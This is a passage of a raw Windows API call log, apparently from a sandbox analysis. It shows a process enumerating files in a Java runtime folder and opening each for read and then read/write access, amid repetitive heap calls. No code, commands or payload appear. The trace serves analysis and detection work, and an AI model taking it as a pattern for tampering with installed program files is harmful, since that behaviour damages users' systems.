(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.127] AreFileApisANSI () returned 1 [0091.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0091.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 53 [0091.127] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8640)) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0091.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.127] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java-rmi.exe", cAlternateFileName="")) returned 1 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0091.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0091.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.128] AreFileApisANSI () returned 1 [0091.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe", lpUsedDefaultChar=0x0) returned 52 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.128] AreFileApisANSI () returned 1 [0091.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0091.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 52 [0091.129] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.129] GetFileType (hFile=0x360) returned 0x1 [0091.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.129] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.130] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.130] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.130] CloseHandle (hObject=0x360) returned 1 [0091.130] AreFileApisANSI () returned 1 [0091.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0091.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 52 [0091.130] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.130] GetFileType (hFile=0x360) returned 0x1 [0091.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0091.130] CloseHandle (hObject=0x360) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.132] AreFileApisANSI () returned 1 [0091.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0091.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 52 [0091.132] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40)) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.132] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java.dll", cAlternateFileName="")) returned 1 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0091.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0091.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0091.133] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.133] AreFileApisANSI () returned 1 [0091.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll", lpUsedDefaultChar=0x0) returned 48 [0091.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.133] AreFileApisANSI () returned 1 [0091.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.133] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0091.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 48 [0091.133] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.133] GetFileType (hFile=0x360) returned 0x1 [0091.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0091.134] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.134] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.134] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.134] CloseHandle (hObject=0x360) returned 1 [0091.134] AreFileApisANSI () returned 1 [0091.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0091.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 48 [0091.134] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.135] GetFileType (hFile=0x360) returned 0x1 [0091.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 